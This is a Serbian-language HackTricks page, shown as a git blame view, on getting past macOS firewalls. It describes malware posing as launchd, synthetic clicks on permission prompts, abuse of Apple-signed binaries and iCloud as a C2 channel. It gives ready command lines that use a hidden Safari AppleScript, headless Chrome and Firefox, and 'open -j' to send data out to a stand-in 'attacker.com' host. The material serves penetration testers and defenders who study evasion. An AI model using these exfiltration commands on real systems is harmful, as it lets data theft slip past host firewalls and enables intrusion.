hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

105 lines
4.5 KiB
Markdown
Raw Normal View History

2024-02-10 13:11:20 +00:00
# Bypassiranje firewalla na macOS-u
<details>
2024-02-10 13:11:20 +00:00
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2023-12-30 20:49:49 +00:00
2024-02-10 13:11:20 +00:00
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>
2024-02-10 13:11:20 +00:00
## Pronađene tehnike
2024-02-10 13:11:20 +00:00
Sledeće tehnike su pronađene da rade u nekim macOS firewall aplikacijama.
2024-02-10 13:11:20 +00:00
### Zloupotreba imena na beloj listi
2024-02-10 13:11:20 +00:00
* Na primer, nazivanje malicioznog softvera imenima dobro poznatih macOS procesa kao što je **`launchd`**&#x20;
2024-02-10 13:11:20 +00:00
### Sintetički klik
2024-02-10 13:11:20 +00:00
* Ako firewall traži od korisnika dozvolu, maliciozni softver treba **kliknuti na dozvolu**
2024-02-10 13:11:20 +00:00
### **Korišćenje Apple potpisanih binarnih fajlova**
2024-02-10 13:11:20 +00:00
* Kao što su **`curl`**, ali i drugi kao što je **`whois`**
2024-02-10 13:11:20 +00:00
### Dobro poznati Apple domeni
2024-02-10 13:11:20 +00:00
Firewall može dozvoljavati konekcije ka dobro poznatim Apple domenima kao što su **`apple.com`** ili **`icloud.com`**. iCloud se može koristiti kao C2.
2024-02-10 13:11:20 +00:00
### Generički Bypass
2024-02-10 13:11:20 +00:00
Neke ideje za pokušaj zaobilaženja firewalla
2024-02-10 13:11:20 +00:00
### Provera dozvoljenog saobraćaja
2024-02-10 13:11:20 +00:00
Poznavanje dozvoljenog saobraćaja će vam pomoći da identifikujete potencijalno beloliste domene ili aplikacije kojima je dozvoljen pristup njima
```bash
lsof -i TCP -sTCP:ESTABLISHED
```
2024-02-10 13:11:20 +00:00
### Zloupotreba DNS-a
2024-02-10 13:11:20 +00:00
DNS rezolucije se vrše putem potpisanog aplikacije **`mdnsreponder`**, koja će verovatno biti dozvoljena da kontaktira DNS servere.
2024-02-07 04:06:18 +00:00
<figure><img src="../../.gitbook/assets/image (1) (1) (6).png" alt="https://www.youtube.com/watch?v=UlT5KFTMn2k"><figcaption></figcaption></figure>
2024-02-10 13:11:20 +00:00
### Putem aplikacija pregledača
* **oascript**
```applescript
tell application "Safari"
2024-02-10 13:11:20 +00:00
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
```
* Google Chrome
{% code overflow="wrap" %}
```bash
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
```
{% endcode %}
* Firefox
```bash
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
```
* Safari
```bash
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
```
2024-02-10 13:11:20 +00:00
### Putem ubrizgavanja procesa
2024-02-10 13:11:20 +00:00
Ako možete **ubrizgati kod u proces** koji je dozvoljen da se poveže sa bilo kojim serverom, možete zaobići zaštitu firewall-a:
{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse](macos-proces-abuse/)
{% endcontent-ref %}
2024-02-10 13:11:20 +00:00
## Reference
* [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)
<details>
2024-02-10 13:11:20 +00:00
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2024-02-10 13:11:20 +00:00
Drugi načini podrške HackTricks-u:
2023-12-30 20:49:49 +00:00
2024-02-10 13:11:20 +00:00
* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
</details>